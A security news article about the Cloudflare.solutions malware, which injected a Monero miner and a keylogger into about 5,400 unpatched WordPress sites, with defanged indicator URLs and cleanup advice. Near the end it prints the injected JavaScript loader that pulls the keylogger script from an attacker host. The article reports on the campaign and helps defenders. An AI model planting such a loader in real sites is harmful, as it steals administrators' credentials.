Over 5 thousand WordPress sites infected with a keylogger

Security researchers have been aware of the crypto-mining malware called Cloudflare.solutions for some time now, but a new development in the story has been revealed. The discovery of this malicious software was made in April and its main objective was to mine crypto-currencies. However, it appears that the malware was updated to contain a keylogger. The estimated number of compromised websites is approximately 5,400 WordPress websites.

Cloudflare.solutions malware injects malicious scripts for a Monero miner and a keylogger

As you know, keyloggers are created in order to steal information: credentials, personal information, banking account details. The keylogger, targeting WordPress websites, opts to steal various types of data like usernames and passwords, but could also be aiming at much bigger prizes.

Cloudflare.solutions malware

In order to put this Cloudflare.solutions malware in action, hackers have to find improperly secured WordPress websites. This usually includes domains that have not been updated for quite some time. Therefore, such domains have security gaps that crooks can take advantage of. Hackers exploit the unpatched vulnerabilities and inject malicious codes into the CMS’ source code.

According to the completed analysis, Cloudflare.solutions malware uses the keylogger for the admin’s login page, and the miner for the site’s frontend. It has been revealed that the injected crypto-miner generates Monero. Researchers from Sucuri have also mentioned a couple of malicious scripts that are injected into vulnerable websites:

• hxxps://cdjs[.]online/lib.js
• hxxps://cdjs[.]online/lib.js?ver=…
• hxxps://cdns[.]ws/lib/googleanalytics.js?ver=…
• hxxps://msdns[.]online/lib/mnngldr.js?ver=…
• hxxps://msdns[.]online/lib/klldr.js

Researchers explain that even more WordPress websites could become victims of this Cloudflare.solutions malware. In order to secure your site, we encourage you to regularly update your domain. This will guarantee that hackers won‘t be able to find any loopholes, allowing them to inject malicious codes.

For those whose WordPress websites have become infected with Cloudflare.solutions virus

If you are one of the unfortunate website-owners, controlling a compromised website, we have a few recommendations. To get rid of the malicious codes in your domain, you have to remove the scripts from theme’s functions.php, and scan wp_posts table for injections. Of course, you should also hurry up and change all your passwords. Remember, that in order to maintain your website and keep it running smoothly, you must update your server software. For more protection, we suggest using a Website Firewall.

Keylogger loads this code into vulnerable domains:

var snf = document.createElement(“script”);
snf.type = “text/javascript”;
snf.setAttribute(“defer”, “defer”);
snf.src = “hxxps://msdns[.]online/lib/kl.js”;
document.head.appendChild(snf);

Source: blog.sucuri.net.

Leave a Reply

Your email address will not be published. Required fields are marked *

Recent Posts

Security Guides

Recent Comments